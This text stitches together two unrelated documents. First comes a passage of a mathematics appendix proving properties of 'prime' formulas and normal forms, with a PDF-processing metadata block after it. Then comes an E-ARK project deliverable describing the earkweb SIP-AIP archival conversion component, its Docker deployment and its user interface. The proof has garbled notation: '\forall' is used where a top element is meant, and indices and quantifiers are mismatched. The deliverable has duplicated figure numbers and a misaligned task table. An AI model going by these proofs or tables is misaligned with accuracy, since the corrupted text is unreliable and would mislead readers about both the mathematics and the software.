where \( m_{\land \lor}(C) = \land_{k \in K} C_k, m_{\land \lor}(C_k) = \lor_{l \in L} C_{lk} \) and \( m_{\land \lor}(D) = \land_{l \in L} D_l, m_{\land \lor}(D_l) = \lor_{s \in L} D_{ls} \).
Then we have
\[ \forall j \in J, l \in L [ \exists i \in I \forall p \in I_i \exists q \in J_j, A_{ip} \leq B_{jq} \land \exists k \in K \forall r \in K_k \exists s \in L_l, C_{kr} \leq D_{ls} ] \]
\[ \Rightarrow \forall j \in J, l \in L [ \exists i \in I, k \in K, \lor_{p \in I_i} A_{ip} \lor_{r \in K_k} \land_{s \in L_l} C_{rk} \leq \lor_{q \in J_j} B_{jq} \lor_{s \in L_l} D_{ls} ] \]
\[ \Rightarrow \forall j \in J, l \in L [ \exists i \in I, k \in K, A_i \land C_k \leq \land \lor_{q \in J_j} B_{jq} \lor_{s \in L_l} D_{ls} ] \]
\[ \Rightarrow \land_{i \in I} \land_{k \in K} (A_i \lor C_k) \leq m_{\land \lor}(A \land C) \land_{i \in I} \land_{k \in K} (B_j \lor D_l) \]
\[ \Rightarrow m_{\land \lor}(A \land C) \leq m_{\land \lor}(B \lor D). \]
We come eventually to the proof of Theorem 2.6.
**Theorem A.4 (Properties of \( \lor \)-prime formulas)**
i) \( \forall \) and any propositional variable are \( \lor \)-prime.
ii) The formula \( \land_{i \in I} (A_i \rightarrow B_i) \) is \( \lor \)-prime for all (finite) \( I \) and formulas \( A_i, B_i \).
iii) If \( m_{\lor \land}(A_i) = \lor_{i \in I} A_i \) then \( A_i \) is \( \lor \)-prime, for all \( i \in I \).
iv) \( B \rightarrow C \neq \forall \) for all \( B, C \).
v) \( \land_{i \in I} (A_i \rightarrow B_i) \leq C \rightarrow D \) and \( C \) is \( \lor \)-prime imply \( C \leq \land_{i \in I} A_i \) and \( \land_{i \in I} B_i \leq D \) for some \( J \subseteq I \).
Proof: i) Let \( A \in \mathcal{PV} \cup \{ \forall \} \), and suppose that \( A \leq B \lor C \). Then \( m_{\lor \land}(A) = A \), while
\[ m_{\lor \land}(B \lor C) = \lor_{j \in J} B_j \lor \land_{k \in K} C_k, \]
where \( m_{\lor \land}(B) = \lor_{j \in J} B_j \) and \( m_{\lor \land}(C) = \land_{k \in K} C_k \). By Proposition A.3 (iii), we have \( A \leq \land \lor_{j \in J} B_j \lor \land_{k \in K} C_k \), so that, by Definition A.1, \( A \leq \land B_j \) or \( A \leq \land C_k \) for some \( j, k \); then \( A \leq B_j \leq B \) or \( A \leq C_k \leq C \) by Proposition A.3 (iii).
ii) By Proposition A.3 (iii) we have:
\[ \land_{i \in I} (A_i \rightarrow B_i) \leq C \lor D \Leftrightarrow m_{\lor \land}(\land_{i \in I} (A_i \rightarrow B_i)) \leq m_{\lor \land}(C \lor D). \]
Now \( m_{\lor \land}(\land_{i \in I} (A_i \rightarrow B_i)) \) is a conjunction of arrows, namely a formula with no disjunction at the top level; on the other hand \( m_{\lor \land}(C \lor D) \) has the form \( \lor_{k \in K} C_k \lor \land_{l \in L} D_l \). By definition of \( \leq_{\lor \land} \), we immediately have that \( m_{\lor \land}(\land_{i \in I} (A_i \rightarrow B_i)) \leq \land C_k \) or \( m_{\lor \land}(\land_{i \in I} (A_i \rightarrow B_i)) \leq \land D_l \), for some \( k, l \); therefore the thesis follows by Proposition A.3 (i) and (ii).
iii) Parts (i) and (ii) imply that any formula in \( T_{\land} \) is \( \lor \)-prime: hence the thesis follows by the definition of \( m_{\lor \land}(\cdot) \).
iv) By contra-position. Suppose that \( \forall \leq B \rightarrow C \); then, by Proposition A.3 (iii), \( \forall \leq \land \lor m_{\lor \land}(B \rightarrow C) = \land_{i \in I, j \in J} (B_i \rightarrow C_j) \). This implies that there exist \( i \) and \( j \) such that \( \forall \leq B_i \rightarrow C_j \), which is not.
v) Let first compute:
\[ m_{\lor \land}(\land_{i \in I} (A_i \rightarrow B_i)) = \land_{i \in I} [ \land_{k \in K} \land_{l \in L} (A_{ik} \rightarrow B_{lj}) ], \]
where $\text{m}_\wedge(A_i) = \bigvee_{h \in H_i} A_{i,h}$, and $\text{m}_\wedge(B_i) = \wedge_{l \in L_i} B_{i,l}$. On the other hand suppose that $\text{m}_\wedge(C \rightarrow D) = \wedge_{p \in P} \wedge_{q \in Q} (C_p \rightarrow D_q)$, where $\text{m}_\wedge(C) = \bigvee_{p \in P} C_p$, and $\text{m}_\wedge(D) = \wedge_{q \in Q} D_q$. By Proposition A.3 (iii) and the definition of $\leq_{\wedge\vee}$ we have
$$\forall p \in P, q \in Q \exists i \in I, h \in H_i, l \in L_i, C_p \leq \wedge A_{i,h} \wedge B_{i,l} \leq \vee D_q.$$
By Proposition A.3 (i), $C \sim \bigvee_{p \in P} C_p$: hence, since $C$ is $\vee$-prime, there exists $p \in P$ such that $C \leq C_p$. Choose one such $p$ and, for any $q \in Q$, define
$$J_q = \{i | \exists i \in I, h \in H_i, l \in L_i, C_p \leq \wedge A_{i,h} \wedge B_{i,l} \leq \vee D_q\},$$
which is non-empty by the above statement. Finally, we take $J = \bigcup_{q \in Q} J_q$. Now, for all $i \in J$, there exists $\exists i \in H_i$ such that $C_p \leq A_{i,h} \wedge A_i$: therefore $C \leq C_p \leq \wedge_{i \in J} A_i$.
To conclude, for all $q \in Q$ there is $i \in J_q$ and $l \in L_i$ such that $B_i \leq B_{i,l} \leq D_q$: then $\wedge_{i \in J} B_i \leq D_q$ for all $q$, and, therefore, $\wedge_{i \in J} B_i \leq \wedge_{q \in Q} D_q \sim D$.
14
|
{"Source-Url": "http://www.doc.ic.ac.uk/~svb/Research/Papers/vBDdLM.pdf", "len_cl100k_base": 15600, "olmocr-version": "0.1.53", "pdf-total-pages": 14, "total-fallback-pages": 0, "total-input-tokens": 74298, "total-output-tokens": 17187, "length": "2e13", "weborganizer": {"__label__adult": 0.0005774497985839844, "__label__art_design": 0.0008988380432128906, "__label__crime_law": 0.0006194114685058594, "__label__education_jobs": 0.0039825439453125, "__label__entertainment": 0.0002624988555908203, "__label__fashion_beauty": 0.0002951622009277344, "__label__finance_business": 0.0006656646728515625, "__label__food_dining": 0.0010194778442382812, "__label__games": 0.0018663406372070312, "__label__hardware": 0.0014438629150390625, "__label__health": 0.0014524459838867188, "__label__history": 0.0009160041809082032, "__label__home_hobbies": 0.000316619873046875, "__label__industrial": 0.0011758804321289062, "__label__literature": 0.0028591156005859375, "__label__politics": 0.0006585121154785156, "__label__religion": 0.0014314651489257812, "__label__science_tech": 0.457763671875, "__label__social_life": 0.00026726722717285156, "__label__software": 0.00661468505859375, "__label__software_dev": 0.5126953125, "__label__sports_fitness": 0.0004277229309082031, "__label__transportation": 0.0014753341674804688, "__label__travel": 0.00030922889709472656}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 45251, 0.01342]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 45251, 0.485]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 45251, 0.69943]], "google_gemma-3-12b-it_contains_pii": [[0, 3055, false], [3055, 6432, null], [6432, 10264, null], [10264, 13087, null], [13087, 16678, null], [16678, 19902, null], [19902, 23554, null], [23554, 26980, null], [26980, 30893, null], [30893, 34181, null], [34181, 37365, null], [37365, 39735, null], [39735, 43934, null], [43934, 45251, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3055, true], [3055, 6432, null], [6432, 10264, null], [10264, 13087, null], [13087, 16678, null], [16678, 19902, null], [19902, 23554, null], [23554, 26980, null], [26980, 30893, null], [30893, 34181, null], [34181, 37365, null], [37365, 39735, null], [39735, 43934, null], [43934, 45251, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 45251, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 45251, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 45251, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 45251, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 45251, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 45251, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 45251, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 45251, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 45251, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 45251, null]], "pdf_page_numbers": [[0, 3055, 1], [3055, 6432, 2], [6432, 10264, 3], [10264, 13087, 4], [13087, 16678, 5], [16678, 19902, 6], [19902, 23554, 7], [23554, 26980, 8], [26980, 30893, 9], [30893, 34181, 10], [34181, 37365, 11], [37365, 39735, 12], [39735, 43934, 13], [43934, 45251, 14]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 45251, 0.0]]}
|
olmocr_science_pdfs
|
2024-12-07
|
2024-12-07
|
10820be96eebb7346cc6571ddbdec0a274aa42c6
|
D.4.4.2 SIP-AIP conversion component: Reference Implementation
DOI: 10.5281/zenodo.1172925
<table>
<thead>
<tr>
<th>Grant Agreement Number:</th>
<th>620998</th>
</tr>
</thead>
<tbody>
<tr>
<td>Project Title:</td>
<td>European Archival Records and Knowledge Preservation</td>
</tr>
<tr>
<td>Release Date:</td>
<td>14th February 2018</td>
</tr>
</tbody>
</table>
Contributors
<table>
<thead>
<tr>
<th>Name</th>
<th>Affiliation</th>
</tr>
</thead>
<tbody>
<tr>
<td>Sven Schlarb</td>
<td>Austrian Institute of Technology</td>
</tr>
<tr>
<td>Jan Rörden</td>
<td>Austrian Institute of Technology</td>
</tr>
<tr>
<td>Mihai Bartha</td>
<td>Austrian Institute of Technology</td>
</tr>
<tr>
<td>Kuldar Aas</td>
<td>National Archives of Estonia</td>
</tr>
<tr>
<td>Andrew Wilson</td>
<td>University of Brighton</td>
</tr>
<tr>
<td>David Anderson</td>
<td>University of Brighton</td>
</tr>
<tr>
<td>Janet Anderson</td>
<td>University of Brighton</td>
</tr>
</tbody>
</table>
STATEMENT OF ORIGINALITY
Statement of originality:
This deliverable contains original unpublished work except where clearly indicated otherwise. Acknowledgement of previously published material and of the work of others has been made through appropriate citation, quotation or both.
# TABLE OF CONTENTS
1. **Scope of this document** .......................................................... 6
2. **Relation to other documents** .................................................. 6
3. **Introduction** ................................................................. 6
4. **E-ARK Web Architecture overview** ....................................... 8
4.1 Cluster software stack .................................................. 8
4.2 Standalone software stack .............................................. 10
5. **SIP-AIP conversion component** ............................................. 15
5.1 Task execution framework .............................................. 15
5.2 SIP-AIP conversion tasks .............................................. 16
6. **E-ARK Web user guide** .......................................................... 19
6.1 SIP Creator .................................................................. 19
6.1.1 Initialise SIP package creation .................................. 19
6.1.2 Adding files to the SIP ........................................... 19
6.1.3 SIP creation process ............................................. 22
6.2 SIP to AIP conversion .......................................................... 25
6.2.1 Start SIP to AIP conversion process ............................ 25
List of Figures
Figure 1: The scope of the this document is Deliverable D4.4 Part B .............................................................. 5
Figure 2: Screenshot of the initial page of the web application E-ARK Web .......................................................... 7
Figure 3: Architecture overview of the full-scale version of E-ARK Web ............................................................ 9
Figure 4: Architecture overview of the lightweight version of E-ARK Web .......................................................... 10
Figure 1 Docker containers of the Standalone Software Stack and the main links between the containers ........... 13
Figure 2 Origin of the images which are the basis to run the Docker containers .................................................. 14
Figure 3 Data directories of the Docker containers and mapping to directories of the host file system .................. 15
Figure 8: Parent-child aggregation submission process ....................................................................................... 32
List of Tables
Table 1 Docker containers of the standalone deployment stack ........................................................................ 11
Table 2 SIP-AIP conversion tasks ..................................................................................................................... 18
Executive Summary
This deliverable D4.4 Part B is the second part of deliverable D4.4 and describes the SIP-AIP conversion component in its final version. The first part D4.4 Part A is an update of the previous deliverable D4.3 and represents the final version of the AIP specification. Figure 1 illustrates the two parts A and B of deliverable 4.4 and highlights Part B as the scope of the present document.
This document focuses on the E-ARK reference implementation of the SIP-AIP conversion component and describes the implementation of the basic concepts and definitions. The deliverable is a follow-up version of E-ARK deliverable D4.3 “E-ARK AIP pilot specification”.
The SIP-AIP conversion component is the reference implementation of the AIP format specification and is an integral part of the web application E-ARK Web (or in short: earkweb). The SIP-AIP conversion component consists of a set of individual tasks which are executed in a specific order to convert an E-ARK submission information package (SIP) into the E-ARK archival information package (AIP).
---
1 http://eark-project.com/resources/project-deliverables/53-d43earkaipspec-1
2 https://github.com/eark-project/earkweb; the actual SIP to AIP conversion component consists of a set of tasks in https://github.com/eark-project/earkweb/blob/master/workers/tasks.py.
1 Scope of this document
This document describes the SIP-AIP conversion component as part of the reference implementation E-ARK Web (in short: earkweb).³ It describes a set of tasks which is used to convert an E-ARK SIP to an E-ARK AIP and explains how these tasks are employed by the web application frontend of earkweb. In order to explain the context in which the SIP-AIP component is embedded, some details about the architecture and a user guide to the earkweb reference implementation are given.
2 Relation to other documents
This document describes how the SIP-AIP conversion is implemented as part of the component earkweb.⁴ It complements part A “AIP format specification” of deliverable D4.4, “Final version of SIP-AIP conversion component”.⁵
Deliverable D4.4 has two previous iterations, Deliverable D4.2⁶ and Deliverable D4.3.⁶
The SIP-AIP conversion component was designed to integrate with the scalable, Hadoop-based back-end implementation. The deliverable D6.3 “Data Mining Showcase” includes a detailed overview of the updated architecture of the Integrated Platform Reference Implementation (IPRIP). The SIP specification is described in the D3.x deliverables.
The fundamental document to understand the purpose of the SIP-AIP conversion is the Reference Model for an Open Archival Information System (OAIS).⁷
3 Introduction
earkweb is an open source archiving and digital preservation system. It is OAIS⁸-oriented which means that data ingest, archiving and dissemination functions operate on information packages bundling content and...
metadata in contiguous containers. The information package format uses METS\(^9\) to represent the structure and PREMIS\(^{10}\) to record digital provenance information.
---
\(^9\) [http://www.loc.gov/standards/mets](http://www.loc.gov/standards/mets)
\(^{10}\) [http://www.loc.gov/standards/premis](http://www.loc.gov/standards/premis)
Earkweb consists of a frontend web application together with a task execution system based on Celery\textsuperscript{11} which allows synchronous and asynchronous processing of information packages by means of processing units which are called “tasks”.
The backend can also be controlled via remote command execution without using the web frontend. The outcomes of operations performed by a task are stored immediately so that the status information in the frontend’s database can be updated afterwards.
The SIP to AIP conversion component is implemented as a set of backend Celery tasks. These tasks can be executed using the web application frontend, by invoking the tasks in headless mode. Earkweb also offers a pre-defined workflow for batch processing which executes the full chain of tasks for automatic SIP-AIP conversion. These alternatives will be explained in detail throughout this document.
4 E-ARK Web Architecture overview
4.1 Cluster software stack
The E-ARK Web architecture is designed for efficiently processing, storing, and accessing very large data collections in terms of scalability, reliability, and cost. The system makes use of technologies like the Apache Hadoop\textsuperscript{12} framework, NGDATA’s Lily\textsuperscript{13} repository, and the Apache SolR\textsuperscript{14} search server allowing the repository infrastructure to scale-out horizontally. Using Hadoop, the number of nodes in a cluster is virtually unlimited and clusters may range from single node installations to clusters comprising thousands of computers. The diagram in Figure 3 gives an overview about this architecture.
\textsuperscript{11} http://www.celeryproject.org/
\textsuperscript{12} http://hadoop.apache.org/
\textsuperscript{13} https://github.com/NGDATA/lilyproject
\textsuperscript{14} http://lucene.apache.org/solr/
The user interface, represented by the box on top of the diagram, is a Python/Django-based web application which allows managing the creation and transformation of information packages. It supports the complete archival package transformation pipeline, beginning with the creation of the Submission Information Package (SIP), to the conversion to an Archival Information Package (AIP), to the creation of the Dissemination Information Package (DIP) which is used to disseminate digital objects to the requesting user. Tasks can be assigned to Celery workers (green boxes with a "C") which share the same storage area and the result of the package transformation is stored in the working directory.
Once the creation of information packages is finished, they can be deployed to the Lily access repository. Lily is built on top of HBase, a NoSQL database that is running on top of Hadoop. Lily defines some data types most of which are based on existing Java data types. Lily records are defined using these data types rather
15 https://hbase.apache.org/
than using plain HBase tables, which makes them better suited for indexing due to a richer data model. The Lily Indexer is the component which sends the data to the Solr server and keeps the index synchronized with the Lily repository. Solr neither reads data from HDFS\textsuperscript{16} nor writes data to HDFS. The index is stored on the local file system and optionally distributed over multiple cluster nodes if index sharding (mechanism used to spread load on databases across multiple servers) or replication is used.
4.2 Standalone software stack
There is also a lightweight version of E-ARK Web where the large-scale storage backend (HDFS, HBase) is replaced by a conventional file system storage and the SolR search server is a single instance of SolR instead of a SolR Cloud deployment, as illustrated by the diagram in Figure 4.
\textbf{Figure 4: Architecture overview of the lightweight version of E-ARK Web}
The standalone version of the IPRIIP e-archiving environment has been made available using a container-based
\textsuperscript{16}“Hadoop Distributed File System (HDFS) is designed to reliably store very large files across machines in a large cluster.”, https://wiki.apache.org/hadoop/HDFS
deployment model based on Docker\textsuperscript{17} in order to support simple and modular installation of the software.
Docker is an open-source engine that automates the deployment of any application as a lightweight and portable container that will run on any platform where the Docker engine is supported.\textsuperscript{18} In order to allow deploying IPRIP services on a Docker platform, Docker containers for the individual services of \textit{earkweb}'s frontend and backend have been created.
Table 1 shows the software module and the corresponding image which is used in a Docker deployment. The left column designates the software module and the right column indicates the image which is used to create and run a container to provide the corresponding service.
<table>
<thead>
<tr>
<th>Software module</th>
<th>Docker image</th>
</tr>
</thead>
<tbody>
<tr>
<td>MysQL\textsuperscript{19}</td>
<td>earkdbimg\textsuperscript{20}</td>
</tr>
<tr>
<td>SolR\textsuperscript{21}</td>
<td>Solr\textsuperscript{22}</td>
</tr>
<tr>
<td>RabbitMQ\textsuperscript{23}</td>
<td>tutum/rabbitmq\textsuperscript{24}</td>
</tr>
<tr>
<td>Redis\textsuperscript{25}</td>
<td>tutum/redis\textsuperscript{26}</td>
</tr>
<tr>
<td>E-ARK Web\textsuperscript{27}</td>
<td>earkwebimg\textsuperscript{28}</td>
</tr>
<tr>
<td>Celery\textsuperscript{29}</td>
<td>earkwebimg</td>
</tr>
<tr>
<td>Celery Flower\textsuperscript{30}</td>
<td>earkwebimg</td>
</tr>
</tbody>
</table>
\textit{Table 1 Docker containers of the standalone deployment stack}
Docker Compose\textsuperscript{31} is used to run the components listed in Table 1 as multi-container Docker applications. Docker Compose allows automatically retrieving or building required images and containers as well as controlling start up and shut down of multiple inter-dependent services. Docker Compose also allows the linking of services to make inter-service communication easier. Figure 5 shows the YAML file which defines
\textsuperscript{17} https://www.docker.com
\textsuperscript{18} https://docs.docker.com/engine/installation
\textsuperscript{19} http://www.mysql.com
\textsuperscript{20} Based on earkweb image created from http://github.com/eark-project/earkweb
\textsuperscript{21} https://lucene.apache.org/solr
\textsuperscript{22} https://hub.docker.com/l/solr
\textsuperscript{23} http://www.rabbitmq.com
\textsuperscript{24} https://hub.docker.com/r/tutum/rabbitmq
\textsuperscript{25} http://redis.io
\textsuperscript{26} https://github.com/tutumcloud/redis
\textsuperscript{27} http://github.com/eark-project/earkweb
\textsuperscript{28} https://github.com/eark-project/earkweb/blob/master/Dockerfile
\textsuperscript{29} http://www.celeryproject.org
\textsuperscript{30} https://github.com/mher/flower
\textsuperscript{31} https://github.com/docker/compose
the service composition so the services can be run together in an isolated environment. The dotted lines are used to visually divide the YAML file according to the different services it defines.
To give one example, the first service, named ‘db’, provides the MySQL database service needed by the earkweb frontend web application to store basic information about the processing status of information packages. The service is defined by the following properties:
- **image**: earkdbimg – The name of the image which is used to provide the MySQL database.
- **container_name**: earkdb_1 – The name of the Docker container.
- **build**: ./docker/earkdb – The Docker file which contains the build instructions to create the Docker image.
- **volumes**: - /tmp/earkweb-mysql-data:/var/lib/mysql – A directory from the Host system (here: /tmp/earkweb-mysql-data) is mounted as the MySQL data directory into the Docker container (here: /var/lib/mysql).
- **ports**: - ‘3306:3306’ – The Port of the application is mapped to the port where the service will be exposed (in this case the standard MySQL port 3306 will be exposed as port 3306 by the container).
Furthermore, the orange arrows in Figure 5 show how the services are linked to each other using the “links” attribute of the earkweb container to reference the required service by name or the BROKER_URL environment variable of the flower service to link to the ‘rabbitmq’ service.
Figure 5 Docker containers of the Standalone Software Stack and the main links between the containers.
Figure 6 shows the origin of the images which are needed to run the various Docker containers. It shows that the Solr, RabbitMQ, and Redis images are directly retrieved from the Docker Image Library\textsuperscript{32}, and that the
\textsuperscript{32} https://hub.docker.com
other containers are based on Docker container build instructions provided in the form of Dockerfiles\textsuperscript{33} as part of the earkweb code base.\textsuperscript{34}

**Figure 6 Origin of the images which are the basis to run the Docker containers**
Finally, Figure 7 shows how various directories of the host file system are mapped to directories of the corresponding Docker containers. On the top right, there are directories of the local file system, and on the bottom right, there are directories of the Docker containers. The colours of the bounding boxes show the relationship between host file system and container directories. For example, the ‘/tmp/earkweb-mysql-data’ directory of the host file system is mapped to the ‘/var/lib/mysql’ directory of the MySQL database container. It is worth highlighting that for the containers earkweb, Celery, and Celery Flower the current directory (‘.’) –
\textsuperscript{33} https://docs.docker.com/engine/reference/builder
\textsuperscript{34} http://github.com/eark-project/earkweb
which corresponds to the `earkweb` code base – is mounted to the `/earkweb` container directory. These containers provide the different types of services (the `earkweb` frontend, the Celery task queue backend, and the Celery Flower task execution monitoring service) based on the same base image using service specific container run instructions respectively.

**Figure 7** Data directories of the Docker containers and mapping to directories of the host file system
## 5 SIP-AIP conversion component
### 5.1 Task execution framework
The SIP-AIP conversion component consists of a set of individual tasks which are executed in a specific order to convert an E-ARK submission information package (SIP) into the E-ARK archival information package (AIP). It is an extensible workflow which can be adapted to specific needs by inserting new tasks at any point of the
workflow. *earkweb* uses a modular approach for defining atomic tasks which perform a specific transformation step of the SIP-AIP conversion, such as the extraction of an SIP or the validation of the descriptive metadata it contains. However, a specific task does not necessarily execute one single action, but can initiate a series of tasks or a complete workflow as well.
Each task is implemented as a python class and is available in the python module “workers/tasks.py”\(^{35}\) of the *earkweb* application. A task which performs a step of the SIP-AIP conversion must extend the default task class DefaultTask defined in the module “workers/default_task.py”\(^{36}\).
The default task makes sure that the pre-conditions for executing a task are fulfilled (e.g. the package is not in an error state), and also records the task execution in the provenance metadata of the package (i.e. the PREMIS metadata file). The default task also verifies if task execution is allowed given the current state of the package. Each task has a property which defines the list of tasks which are accepted as previously executed tasks. The fact that a task is defined as an “accepted last task” means that if execution was successful, there is the assumption that it produces valid output to be used as input for the current task. For example, to execute the SIPValidation task\(^{37}\) which validates the structure of the E-ARK IP, it is a requirement that the transferred entity (the SIP’s TAR file) was extracted successfully by the SIPExtraction task.\(^{38}\)
### 5.2 SIP-AIP conversion tasks
Table 2 provides an overview of the tasks which together represent the SIP-AIP conversion component.
<table>
<thead>
<tr>
<th>Task name</th>
<th>Accepted inputs</th>
<th>Task description</th>
</tr>
</thead>
<tbody>
<tr>
<td>SIPDeliveryValidation</td>
<td>SIPValidation, SIPtoAIPReset</td>
<td>Validation of the delivery of the ZIP or TAR file against a delivery METS XML file to verify the integrity of the transferred file.</td>
</tr>
<tr>
<td>IdentifierAssignment</td>
<td>SIPDeliveryValidation</td>
<td>Assignment of a unique identifier. In the reference</td>
</tr>
</tbody>
</table>
\(^{35}\)https://github.com/eark-project/earkweb/blob/master/workers/tasks.py
\(^{36}\)https://github.com/eark-project/earkweb/blob/master/workers/default_task.py
\(^{37}\)https://github.com/eark-project/earkweb/blob/6be44bc8ed3d346141c7f7e4091f1069c7a467f5/workers/tasks.py#L1100
\(^{38}\)https://github.com/eark-project/earkweb/blob/6be44bc8ed3d346141c7f7e4091f1069c7a467f5/workers/tasks.py#L1059
<table>
<thead>
<tr>
<th>Task</th>
<th>Predecessors</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>SIPExtraction</td>
<td>IdentifierAssignment</td>
<td>Implementation a URN with the namespace identifier “uuid” is generated.</td>
</tr>
<tr>
<td>SIPValidation</td>
<td>SIPExtraction</td>
<td>Extraction of the TAR or ZIP file containing the SIP.</td>
</tr>
<tr>
<td>SIPRestructuring</td>
<td>SIPValidation, SIPExtraction</td>
<td>Validation of the structure of the SIP as well as the structural (METS) and preservation (PREMIS) metadata.</td>
</tr>
<tr>
<td>AIPDescriptiveMetadataValidation</td>
<td>AIPDescriptiveMetadataValidation, SIPRestructuring</td>
<td>Restructuring of the SIP according to the AIP structure which encloses the SIP.</td>
</tr>
<tr>
<td>AIPDescriptiveMetadataValidation</td>
<td>AIPDescriptiveMetadataValidation, SIPRestructuring</td>
<td>Validation of descriptive metadata. In the current state, only EAD descriptive metadata is validated.</td>
</tr>
<tr>
<td>AIPMigrations</td>
<td>SIPRestructuring, AIPDescriptiveMetadataValidation, MigrationProcess, AIPMigrations, AIPCheckMigrationProgress</td>
<td>Execute AIP migrations according to defined migration rules. As examples, PDF to PDF/A and GIF to TIFF migrations are defined with corresponding tools performing the migrations.</td>
</tr>
<tr>
<td>AIPCheckMigrationProgress</td>
<td>AIPCheckMigrationProgress, AIPMigrations, MigrationProcess</td>
<td>This task can be invoked to query the migration process.</td>
</tr>
<tr>
<td>CreatePremisAfterMigration</td>
<td>CreatePremisAfterMigration, AIPCheckMigrationProgress</td>
<td>Create PREMIS metadata after migration.</td>
</tr>
<tr>
<td>AIPRepresentationMetsCreation</td>
<td>AIPRepresentationMetsCreation, CreatePremisAfterMigration</td>
<td>Create the METS structural metadata file for each representation contained in the AIP.</td>
</tr>
</tbody>
</table>
### Table 2 SIP-AIP conversion tasks
<table>
<thead>
<tr>
<th>Task</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>AIPPackageMetsCreation</td>
<td>Create the AIP METS file referencing the METS files of the representations contained in the AIP.</td>
</tr>
<tr>
<td>AIPValidation</td>
<td>Validation of the structure of the AIP as well as the structural (METS) and preservation (PREMIS) metadata.</td>
</tr>
<tr>
<td>AIPPackaging</td>
<td>Packaging the AIP as a TAR file.</td>
</tr>
</tbody>
</table>
| AIPStore | Store the AIP in the file system in the Pairtree storage. This is the storage area of the standalone software stack. In the cluster software stack this storage area represents the staging area holding packages which are to be uploaded to the Lily Repository.
---
39 The files are uploaded to the Hadoop Distributed File System (HDFS) of the Lily Repository. See deliverable D6.2 for details about the Lily Repository at [http://eark-project.com/resources/project-deliverables/54-d62intplatformref-1](http://eark-project.com/resources/project-deliverables/54-d62intplatformref-1)
6 E-ARK Web user guide
6.1 SIP Creator
A Submission Information Package (SIP) – as defined in the OAIS model – is an information package that is delivered by a producer to the OAIS for use in the construction or update of one or more Archival Information Packages (AIPs).
The SIP Creator is a web-based interface allowing the creation of E-ARK Submission Information Packages (SIPs). Files can be uploaded to the corresponding sections (content, documentation and metadata) of the container and a set of tasks allows transforming the SIP into the required format.
6.1.1 Initialise SIP package creation
In this step it is required that a package name for the SIP be provided:

Create new SIP
In this step it is required to provide a package name for the SIP:
SIP package name: example
Proceed
Note that a package name must have at least 3 characters.
Click on 'Proceed' to continue with the next step.
6.1.2 Adding files to the SIP
A web form allows uploading files to the corresponding areas of the SIP.
In the E-ARK SIP, each representation - as a set of files needed to render an intellectual entity - is stored in a separate directory under the "representations" directory.
It is required that a name be given to the representation which will be used as the name of the directory where the actual data, additional documentation, and schemas can be uploaded.
To create a new representation, enter the name (at least 4 characters long) in the editable select box and click the "plus" symbol which will enable the upload area of the new representation:
To switch between existing representations choose the representation from the select box ('caret' symbol next to the "plus" symbol).
If the upload area of the representation is loaded, files can be uploaded by clicking on 'Browse ...' and selecting a file from the local file system.
Package a set of files using the tar format to upload a collection of files which are automatically extracted in the upload directory.
Hover your mouse over the user interface widgets to get more information about the individual elements.
Click on the "Proceed" button to continue with the next step.
6.1.3 SIP creation process
6.1.3.1 Start SIP creation process
The SIP creation process interface allows executing SIP creation tasks:
- SIPReset
- SIPDescriptiveMetadataValidation
- SIPPackagedMetadataCreation
- SIPPackaging
- SIPClose
6.1.3.1.1 Task execution
The tasks in the pull-down menu near the label "Tasks" appear in the logical order in which they should be executed.
The "SIP creation task/workflow execution" overview table shows the information entities of the package:
- The "Package name" is the name of the SIP which is the outcome of the current SIP creation process.
- The "Process ID" is a UUID which corresponds to the name of the working area directory.
- The "Working area path" is a link which allows accessing the working area directory of the corresponding package to see the result of a task execution.
- The "Last task" shows the last task which was executed, e.g. "SIPValidation". The last task also determines the following task which can be executed because each task defines a list of accepted input tasks.
- Last change is the date/time of the last modification (by a task)
- Process status shows the consistency status of a package. If the process status shows the value
"Success (0)" together with a green "check mark" symbol, then the status of the package is consistent. If an error occurred during processing, the process status shows the value "Error (1)" together with a green "warning triangle" symbol.
Selected information and error log messages appear in the "Process log" and "Error log" areas, more detailed information about the processing might be available in the earkweb processing log which is available in the package.
Use the "SIPReset" task to roll-back package processing to the initial state in case an error occurred during processing (after applying required modifications).
It is possible to directly continue with the "SIP to AIP conversion" process by executing the "SIP Close" task. Note that in this case the package disappears from the "Active SIP creation processes" overview page as it is handed over to the "SIP to AIP conversion".
6.1.3.2 Active SIP creation processes overview
By accessing the sub-menu item "Active SIP creation processes", an overview about open SIP creation processes is shown. Each package is identified by the package name (column 'Package name') which was provided in the first step of the SIP creation process and an internal process identifier (column 'Process ID'). The process identifier is also used as the name of the working directory where information package transformations take place (column 'SIP creation working directory').
Depending on the last task that was executed, subsequent transformation tasks can be applied.
### 6.2 SIP to AIP conversion
The AIP – as defined in the OAIS reference model – is an information package used to transmit and/or store archival objects within a digital repository. An AIP contains both, structural and descriptive metadata about the content, as well as the actual content itself.
The SIP to AIP conversion is a set of tasks that can be performed to convert an E-ARK SIP to an E-ARK AIP which must comply with both structural and metadata requirements defined by the E-ARK project.
#### 6.2.1 Start SIP to AIP conversion process
The "SIP to AIP conversion" is either started by handing the package over from the "SIP creation" process.
within *earkweb* by executing the "SIP Close" task or it can be uploaded using the "SIP to AIP conversion" sub-menu item "Upload SIP":
